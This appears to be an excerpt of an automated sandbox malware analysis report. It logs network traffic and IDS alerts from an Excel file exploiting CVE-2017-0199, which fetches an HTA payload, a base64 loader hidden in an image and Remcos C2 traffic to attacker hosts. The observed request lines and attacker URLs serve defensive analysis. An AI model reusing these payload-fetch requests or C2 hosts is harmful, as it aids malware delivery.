          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
          Source: global trafficTCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
          Source: global trafficTCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
          Source: global trafficTCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
          Source: global trafficTCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
          Source: global trafficTCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
          Source: global trafficTCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
          Source: global trafficTCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
          Source: global trafficTCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
          Source: global trafficTCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
          Source: global trafficTCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
          Source: global trafficTCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
          Source: global trafficTCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
          Source: global trafficTCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
          Source: global trafficTCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
          Source: global trafficTCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
          Source: global trafficTCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
          Source: global trafficTCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
          Source: global trafficTCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
          Source: global trafficTCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
          Source: global trafficTCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
          Source: global trafficTCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
          Source: global trafficTCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
          Source: global trafficTCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
          Source: global trafficTCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
          Source: global trafficTCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
          Source: global trafficTCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
          Source: global trafficTCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
          Source: global trafficTCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
          Source: global trafficTCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
          Source: global trafficTCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
          Source: global trafficTCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
          Source: global trafficTCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
          Source: global trafficTCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
          Source: global trafficTCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
          Source: global trafficTCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
          Source: global trafficTCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
          Source: global trafficTCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
          Source: global trafficTCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
          Source: global trafficTCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
          Source: global trafficTCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
          Source: global trafficTCP traffic: 192.168.2.22:49165 -> 107.174.146.46:80
          Source: global trafficTCP traffic: 107.174.146.46:80 -> 192.168.2.22:49165

          Networking

          barindex
          Source: Network trafficSuricata IDS: 2858795 - Severity 1 - ETPRO MALWARE ReverseLoader Payload Request (GET) M2 : 192.168.2.22:49165 -> 107.174.146.46:80
          Source: Network trafficSuricata IDS: 2024197 - Severity 1 - ET EXPLOIT MSXMLHTTP Download of HTA (Observed in CVE-2017-0199) : 107.174.146.46:80 -> 192.168.2.22:49162
          Source: Network trafficSuricata IDS: 2024197 - Severity 1 - ET EXPLOIT MSXMLHTTP Download of HTA (Observed in CVE-2017-0199) : 107.174.146.46:80 -> 192.168.2.22:49164
          Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.22:49178 -> 107.175.130.20:14645
          Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.22:49176 -> 107.175.130.20:14645
          Source: Network trafficSuricata IDS: 2020423 - Severity 1 - ET EXPLOIT_KIT ReverseLoader Base64 Payload Inbound : 107.174.146.46:80 -> 192.168.2.22:49174
          Source: Network trafficSuricata IDS: 2020425 - Severity 1 - ET EXPLOIT_KIT ReverseLoader Base64 Payload Inbound M2 : 107.174.146.46:80 -> 192.168.2.22:49174
          Source: Network trafficSuricata IDS: 2858295 - Severity 1 - ETPRO MALWARE ReverseLoader Base64 Encoded EXE With Content-Type Mismatch (text/plain) : 107.174.146.46:80 -> 192.168.2.22:49174
          Source: Network trafficSuricata IDS: 2049038 - Severity 1 - ET MALWARE ReverseLoader Reverse Base64 Loader In Image M2 : 142.250.185.65:443 -> 192.168.2.22:49167
          Source: Network trafficSuricata IDS: 2049038 - Severity 1 - ET MALWARE ReverseLoader Reverse Base64 Loader In Image M2 : 172.217.16.193:443 -> 192.168.2.22:49175
          Source: unknownDNS query: name: seemebest2024rmc.duckdns.org
          Source: global trafficTCP traffic: 192.168.2.22:49176 -> 107.175.130.20:14645
          Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur HTTP/1.1Host: drive.google.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /download?id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur&export=download HTTP/1.1Host: drive.usercontent.google.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur HTTP/1.1Host: drive.google.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /download?id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur&export=download HTTP/1.1Host: drive.usercontent.google.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /57/RFGGVFRR.txt HTTP/1.1Host: 107.174.146.46Connection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
          Source: Joe Sandbox ViewIP Address: 172.67.162.95 172.67.162.95
          Source: Joe Sandbox ViewIP Address: 104.21.74.191 104.21.74.191
          Source: Joe Sandbox ViewIP Address: 107.175.130.20 107.175.130.20
          Source: Joe Sandbox ViewIP Address: 178.237.33.50 178.237.33.50
          Source: Joe Sandbox ViewASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS
          Source: Joe Sandbox ViewASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS
          Source: Joe Sandbox ViewJA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
          Source: Joe Sandbox ViewJA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
          Source: Network trafficSuricata IDS: 2024449 - Severity 1 - ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl : 192.168.2.22:49162 -> 107.174.146.46:80
          Source: Network trafficSuricata IDS: 2024449 - Severity 1 - ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl : 192.168.2.22:49164 -> 107.174.146.46:80
          Source: Network trafficSuricata IDS: 2024449 - Severity 1 - ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl : 192.168.2.22:49172 -> 107.174.146.46:80
          Source: Network trafficSuricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.22:49177 -> 178.237.33.50:80
          Source: global trafficHTTP traffic detected: GET /KJAPmB?&internet=cooperative&crew=salty&corral=momentous&eyestrain HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: acesso.runConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /KJAPmB?&internet=cooperative&crew=salty&corral=momentous&eyestrain HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: acesso.runConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /KJAPmB?&internet=cooperative&crew=salty&corral=momentous&eyestrain HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: acesso.runConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /KJAPmB?&internet=cooperative&crew=salty&corral=momentous&eyestrain HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: acesso.runConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /57/noc/ernashgetmebackwithgoodnewswhichgrreatthings.hta HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 107.174.146.46Connection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /57/noc/ernashgetmebackwithgoodnewswhichgrreatthings.hta HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Range: bytes=8896-Connection: Keep-AliveHost: 107.174.146.46If-Range: "33796-625b5448e34a0"
          Source: global trafficHTTP traffic detected: GET /57/picturewithgreatnewswithgoodthingsonbestplace.tIF HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 107.174.146.46Connection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /57/noc/ernashgetmebackwithgoodnewswhichgrreatthings.hta HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)If-Modified-Since: Wed, 30 Oct 2024 17:45:29 GMTConnection: Keep-AliveHost: 107.174.146.46If-None-Match: "33796-625b5448e34a0"
          Source: unknownHTTPS traffic detected: 142.250.184.206:443 -> 192.168.2.22:49166 version: TLS 1.0
          Source: unknownHTTPS traffic detected: 142.250.185.65:443 -> 192.168.2.22:49167 version: TLS 1.0
          Source: unknownHTTPS traffic detected: 142.250.184.206:443 -> 192.168.2.22:49173 version: TLS 1.0
          Source: unknownHTTPS traffic detected: 172.217.16.193:443 -> 192.168.2.22:49175 version: TLS 1.0
          Source: unknownTCP traffic detected without corresponding DNS query: 107.174.146.46
          Source: unknownTCP traffic detected without corresponding DNS query: 107.174.146.46
          Source: unknownTCP traffic detected without corresponding DNS query: 107.174.146.46
          Source: unknownTCP traffic detected without corresponding DNS query: 107.174.146.46
          Source: unknownTCP traffic detected without corresponding DNS query: 107.174.146.46
          Source: unknownTCP traffic detected without corresponding DNS query: 107.174.146.46
          Source: unknownTCP traffic detected without corresponding DNS query: 107.174.146.46
          Source: unknownTCP traffic detected without corresponding DNS query: 107.174.146.46
          Source: unknownTCP traffic detected without corresponding DNS query: 107.174.146.46
          Source: unknownTCP traffic detected without corresponding DNS query: 107.174.146.46
          Source: unknownTCP traffic detected without corresponding DNS query: 107.174.146.46
          Source: unknownTCP traffic detected without corresponding DNS query: 107.174.146.46
          Source: unknownTCP traffic detected without corresponding DNS query: 107.174.146.46
          Source: unknownTCP traffic detected without corresponding DNS query: 107.174.146.46
          Source: unknownTCP traffic detected without corresponding DNS query: 107.174.146.46
          Source: unknownTCP traffic detected without corresponding DNS query: 107.174.146.46
          Source: unknownTCP traffic detected without corresponding DNS query: 107.174.146.46
          Source: unknownTCP traffic detected without corresponding DNS query: 107.174.146.46
          Source: unknownTCP traffic detected without corresponding DNS query: 107.174.146.46
          Source: unknownTCP traffic detected without corresponding DNS query: 107.174.146.46
          Source: unknownTCP traffic detected without corresponding DNS query: 107.174.146.46
          Source: unknownTCP traffic detected without corresponding DNS query: 107.174.146.46
          Source: unknownTCP traffic detected without corresponding DNS query: 107.174.146.46
          Source: unknownTCP traffic detected without corresponding DNS query: 107.174.146.46
          Source: unknownTCP traffic detected without corresponding DNS query: 107.174.146.46
          Source: unknownTCP traffic detected without corresponding DNS query: 107.174.146.46
          Source: unknownTCP traffic detected without corresponding DNS query: 107.174.146.46
          Source: unknownTCP traffic detected without corresponding DNS query: 107.174.146.46
          Source: unknownTCP traffic detected without corresponding DNS query: 107.174.146.46
          Source: unknownTCP traffic detected without corresponding DNS query: 107.174.146.46
          Source: unknownTCP traffic detected without corresponding DNS query: 107.174.146.46
          Source: unknownTCP traffic detected without corresponding DNS query: 107.174.146.46
          Source: unknownTCP traffic detected without corresponding DNS query: 107.174.146.46
          Source: unknownTCP traffic detected without corresponding DNS query: 107.174.146.46
          Source: unknownTCP traffic detected without corresponding DNS query: 107.174.146.46
          Source: unknownTCP traffic detected without corresponding DNS query: 107.174.146.46
          Source: unknownTCP traffic detected without corresponding DNS query: 107.174.146.46
          Source: unknownTCP traffic detected without corresponding DNS query: 107.174.146.46
          Source: unknownTCP traffic detected without corresponding DNS query: 107.174.146.46
          Source: unknownTCP traffic detected without corresponding DNS query: 107.174.146.46
          Source: unknownTCP traffic detected without corresponding DNS query: 107.174.146.46
          Source: unknownTCP traffic detected without corresponding DNS query: 107.174.146.46
          Source: unknownTCP traffic detected without corresponding DNS query: 107.174.146.46
          Source: unknownTCP traffic detected without corresponding DNS query: 107.174.146.46
          Source: unknownTCP traffic detected without corresponding DNS query: 107.174.146.46
          Source: unknownTCP traffic detected without corresponding DNS query: 107.174.146.46
          Source: unknownTCP traffic detected without corresponding DNS query: 107.174.146.46
          Source: unknownTCP traffic detected without corresponding DNS query: 107.174.146.46
          Source: unknownTCP traffic detected without corresponding DNS query: 107.174.146.46
          Source: unknownTCP traffic detected without corresponding DNS query: 107.174.146.46
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_000007FE899B4B18 URLDownloadToFileW,5_2_000007FE899B4B18
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\4AA02F62.emfJump to behavior
          Source: global trafficHTTP traffic detected: GET /KJAPmB?&internet=cooperative&crew=salty&corral=momentous&eyestrain HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: acesso.runConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /KJAPmB?&internet=cooperative&crew=salty&corral=momentous&eyestrain HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: acesso.runConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur HTTP/1.1Host: drive.google.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /download?id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur&export=download HTTP/1.1Host: drive.usercontent.google.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /KJAPmB?&internet=cooperative&crew=salty&corral=momentous&eyestrain HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: acesso.runConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /KJAPmB?&internet=cooperative&crew=salty&corral=momentous&eyestrain HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: acesso.runConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur HTTP/1.1Host: drive.google.comConnection: Keep-Alive
